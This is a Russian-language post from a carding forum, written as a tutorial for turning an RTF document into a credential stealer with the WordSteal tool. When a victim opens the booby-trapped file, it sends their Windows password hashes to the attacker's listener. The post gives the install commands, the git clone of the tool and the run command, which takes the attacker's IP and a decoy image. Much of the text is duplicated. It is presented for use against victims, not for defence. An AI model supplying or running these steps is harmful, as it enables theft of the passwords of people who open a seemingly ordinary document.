Carding 4 Carders
Professional
- Messages
- 2,730
- Reaction score
- 1,467
- Points
- 113
Всем привет.
Задумывались ли вы, что при скачивании и открытии какого-либо документа, там вас может ожидать неприятная ситуация, а точнее - вирус? Если нет, то время начать проверять даже документы, а то 21 век на дворе.
А сегодня я наглядно покажу, как можно вшить стиллер в RTF файл, с помощью утилиты WordSteal.
Когда юзер откроет такой файл, то хакер автоматически получит хеши паролей Виндоус.
Установка:
Для начала вам потребуется metasploit, Linux, Termux.
Использование
Вам понадобиться какая-либо картинка. Вы должны прописать к ней абсолютный путь, либо же засунуть её в папку с скриптом и написать только её название:
Пример:
Если всё прошло успешно, то в папке должен появится RTF с вшитой полезной нагрузкой. Терминал не нужно закрывать!
Далее этот файл должен кто-то открыть и в наш терминал придут все хеши паролей.
Задумывались ли вы, что при скачивании и открытии какого-либо документа, там вас может ожидать неприятная ситуация, а точнее - вирус? Если нет, то время начать проверять даже документы, а то 21 век на дворе.
А сегодня я наглядно покажу, как можно вшить стиллер в RTF файл, с помощью утилиты WordSteal.
Когда юзер откроет такой файл, то хакер автоматически получит хеши паролей Виндоус.
Установка:
Для начала вам потребуется metasploit, Linux, Termux.
Code:
▪️apt install python git
▪️git clone https://github.com/0x09AL/WordSteal.git
▪️cd
▪️chmod +x main.py
Использование
Вам понадобиться какая-либо картинка. Вы должны прописать к ней абсолютный путь, либо же засунуть её в папку с скриптом и написать только её название:
Code:
▪️python main.py ваш_IP название_картинки 1
Code:
▪️python main.py 128.0.0.1 blackcode.jpg 1
Далее этот файл должен кто-то открыть и в наш терминал придут все хеши паролей.